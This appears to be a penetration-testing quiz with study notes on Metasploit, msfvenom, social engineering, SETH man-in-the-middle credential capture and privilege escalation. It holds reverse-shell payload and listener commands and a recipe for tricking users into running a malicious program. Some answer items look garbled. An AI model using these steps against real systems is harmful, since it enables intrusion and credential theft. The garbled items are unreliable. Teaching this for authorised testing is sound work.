Exploiting Systems with Metasploit

Questions and Answers

What is the primary goal of attackers posing as individuals from a fraud department?

To retrieve personal login information (correct)

To promote legitimate financial services

To encourage security awareness among users

To provide security updates to users

Which of the following is NOT a type of physical security control mentioned?

Traditional locks and keys

Electronic locking systems

High fencing around the perimeter

Biometric scanning systems (correct)

What is the purpose of ID badges in a highly secured environment?

To prove employment duration

To control access to the building (correct)

To ensure employee training is up-to-date

To identify employees for internal communications

How do security guards contribute to physical security at facility entrances?

By ensuring everyone has proper identification

What method is mentioned as a way to control access within different areas of a building?

Locked doors

What is the focus of penetration testing in relation to physical security?

To exploit vulnerabilities and gain unauthorized access

What might visitors need to do before gaining entry to a secure facility?

Obtain a guest badge and be escorted

What is a common misconception about the role of security guards in a facility?

They only monitor external threats

What potential risk is associated with the User's password hashes when using LSASS?

They can be dumped to a file for cracking.

Which of the following scenarios could lead to vulnerabilities in unattended installations?

Using default installation settings.

What information does the SAM database primarily store?

User's password hashes and usernames.

What is DLL hijacking?

Loading a malicious DLL in place of a genuine DLL.

How can unquoted service paths pose security risks?

They can lead to privilege escalation by manipulating paths.

What is the primary target of a whaling phishing attack?

The CEO or high-level executives

What does the 'sc config' command allow an attacker to do?

Modify the configuration of writable services.

What does a USB key drop test the security awareness of?

The employees’ response to untrusted devices

What type of permissions can lead to vulnerabilities in a system?

Non-secure file and folder permissions.

Which social engineering tactic involves tricking users into revealing sensitive information by impersonating a trusted figure?

Impersonation

What is one consequence of having unpatched services running on a system?

They may provide attackers a pathway into the system.

What is the potential outcome of successfully executing a USB key drop?

Identification of potential network targets

What should be defined in the rules of engagement regarding penetration testing?

Whether social engineering attacks are permitted

What is one of the purposes of conducting interrogation in social engineering?

To gather sensitive information through questioning

Which phrase best describes a 'watering hole attack' in social engineering?

Targeting a specific group of users through compromised websites

What should a penetration tester do before performing social engineering attacks?

Obtain specific permissions as outlined in the engagement rules

What is the purpose of the command 'set payload windows/x64/meterpreter/reverse_tcp'?

To specify the payload type for the exploit.

What should you do if you encounter an error while running the exploit command?

Use the 'show options' command to check for missing settings.

After obtaining a meterpreter session, which of the following actions can you perform?

Turn on the target's webcam.

What does msfvenom primarily do?

It generates and outputs shell codes for exploits.

In the context of exploiting a system, what is a 'reverse shell'?

A connection that allows the target to connect back to the attacker.

Which command is useful for verifying the settings of a payload before executing the exploit?

show options

Which of the following best describes the meterpreter prompt?

It shows that a meterpreter session has been initiated.

What is the first step to exploit a system using the generated malicious program?

Record the IP address using ifconfig.

What physical reaction often indicates stress during an interview or interrogation?

Touching their face

What occurs in a watering hole attack?

Compromising a popular website to execute malicious code

What is the primary goal of social engineering attacks?

To elicit a response that compromises security

Which influence technique involves suggesting urgency to trick users into acting quickly?

Urgency

In social engineering, how does the authority technique typically work?

By pretending to be a person of authority demanding an action

What does a business email compromise (BEC) attack primarily exploit?

Gaining unauthorized access to an employee’s email account

What is a common outcome when someone feels a sense of scarcity during a social engineering attack?

They may quickly follow through with the requested action

Which social engineering technique could involve offering a limited-time prize to entice action?

Scarcity

What is SSL stripping primarily used for?

To remove encryption from communication during a MiTM attack

In a downgrade attack, which of the following is the attacker attempting to force the victim to use?

A lower version protocol that is unsecure

What is the main function of SETH in a MiTM attack?

To capture logon credentials between a server and client

What initial command should you run to configure your network interface in Kali before using SETH?

ifconfig

Which command is used to download SETH?

git clone https://github.com/SySS-Research/Seth.git

What is a potential risk when the RDP server is on a different subnet during a MiTM attack with SETH?

The router's IP address needs to be used instead

What does the attacker achieve by having a secure connection with the website during SSL stripping?

They can decrypt communication between the latter and the victim

What is one requirement before executing the SETH script?

The RDP client's IP must be known

Study Notes

Exploiting Systems

• The third phase of penetration testing involves exploiting vulnerabilities to gain access to target systems.
• Common exploits include SMB, pass the hash, password cracking, social engineering, man-in-the-middle (MiTM) attacks, and physical security attacks.
• Metasploit is a popular exploit tool.
• Critical vulnerabilities should be prioritized for exploitation.

Exploiting Systems with Metasploit

• After a vulnerability scan, a list of exploitable vulnerabilities is generated.
• Metasploit Framework is a common exploit tool.
• It's pre-installed on Kali Linux, but downloadable for other platforms.
• The process involves searching for a suitable exploit using exploit information from vulnerability scans.
• Exploits are ranked (manual, low, average, normal, good, great, or excellent) based on reliability and ease of use.
• Exploits have descriptions and ranks that indicate their efficiency.

Starting Metasploit

• Start a terminal session in Kali Linux.
• Run msfconsole.
• The Metasploit prompt (msf >) appears.
• Use the ? command to list all possible commands.
• Use the search command to find an exploit; for example, msf > search EternalBlue searches for exploits relevant to EternalBlue.

Searching for an exploit

• Identify the exploit from the vulnerability scan report.
• Search using the exploit ID (e.g., MS17-010) or a descriptive term (e.g., EternalBlue).
• Note the exploit's path (e.g., exploit/windows/smb/ms17_010_eternalblue) for later use.

Exploiting

• Identify required options using the show options command.
• Use set to adjust required options; for instance, set RHOST 192.168.67.135.
• Run exploit.
• The output displays successful exploit execution. A Windows command prompt appearing represents system access.
• Useful commands to manage the system or retrieve account information are needed.

Setting the payload

• The payload is code to execute on the target post exploitation.
• Use show payloads to view available payloads.
• Use set payload to select a specific payload (e.g., set payload windows/x64/meterpreter/reverse_tcp).
• Run the exploit again to use the selected payload.

Using msfvenom

• Msfvenom is a payload generator for creating malicious payloads that connect to a pen-test system.
• Generate a payload to connect to your system using reverse TCP using the command -p windows/meterpreter/reverse_tcp LHOST=<ip_of_Kali> LPORT=4444.

Phase 1: Create the malicious program

• Enter your Kali IP address (LHOST) for establishing a connection.
• Specify port 4444 (LPORT) for communication.
• This generates malicious code to remotely connect to your system.

Phase 2: Set up a listener

• Launch msfconsole and use command to establish a listener, for example run use exploit/multi/handler.
• Set the payload using set payload windows/meterpreter/reverse_tcp.
• Set local host using set LHOST <ip_of_Kali>.
• Run the exploit using exploit. (This creates a listener that awaits a connection)

Phase 3: Trick users into running the program

• Send the malicious program to the target (e.g. email, USB drive).
• Target user runs the malicious program. Then your system will connect via a meterpreter shell as noted.
• Take necessary action to further compromise the system.

Using exploit resources

• exploit-db is a useful database.
• Tools and techniques for exploit research, such as exploit-db are used for finding vulnerabilities.
• Methods and tools for locating exploits allow penetration testers to research effectively.

Understanding Social Engineering

• Social engineering is a deception technique to compromise system security with social interaction (e.g. emails, texts, phone calls).
• Common types include spear phishing, SMS phishing, vishing, and whaling.

Other common attacks

• DNS cache poisoning: Attacker alters DNS resolution to direct users to a fake site.
• Pass the hash: Use a victim's password hash to authenticate to other systems.

DoS/stress testing

• DoS/stress testing floods a system with requests to overload it.
• Verify permitted use for penetration tests before performing DoS attacks.

NAC bypass

• Network Access Control (NAC) technologies check device access.
• Attackers can spoof MAC addresses to bypass NAC controls.

VLAN hopping

• VLANs (virtual LANs) separate networks, making them inaccessible to each other.
• Exploiters can manipulate VLAN tagging or trunking protocols to access different VLANs.

MAC spoofing

• Changing the MAC address of a device to impersonate another.

Exploiting Local-Host Vulnerabilities

• Vulnerabilities in specific operating systems (Windows, macOS, Linux) and services are tested.

Unsecure service/protocol configurations

• Vulnerable services or protocol settings (e.g., default folders, permissions) can be exploited.

Privilege escalation

• Exploiting system vulnerabilities with elevated privileges.

Linux-specific exploits (SUID/SGID programs, Ret2libc, Sticky bit, Unsecure SUDO).

Windows-specific exploits (Cpassword, Clear text credentials in LDAP, Kerberoasting, Credentials in LSASS).

Common exploits

• Exploits target common networking services/protocols (e.g., SMB, FTP, SNMP, SMTP).
• Name resolution exploits manipulate name-to-IP address resolution.
• Link–Local Multicast Name Resolution (LLMNR)/NetBIOS Name Service (NBT-NS) poisoning corrupts the network resolution.
• NTLM relay attacks capture password hashes.

Description

This quiz focuses on the techniques and tools used in the third phase of penetration testing, particularly the Metasploit Framework. Participants will learn about common exploits, the exploitation process after vulnerability scans, and how to effectively utilize Metasploit. Understanding these concepts is essential for anyone interested in cybersecurity and penetration testing.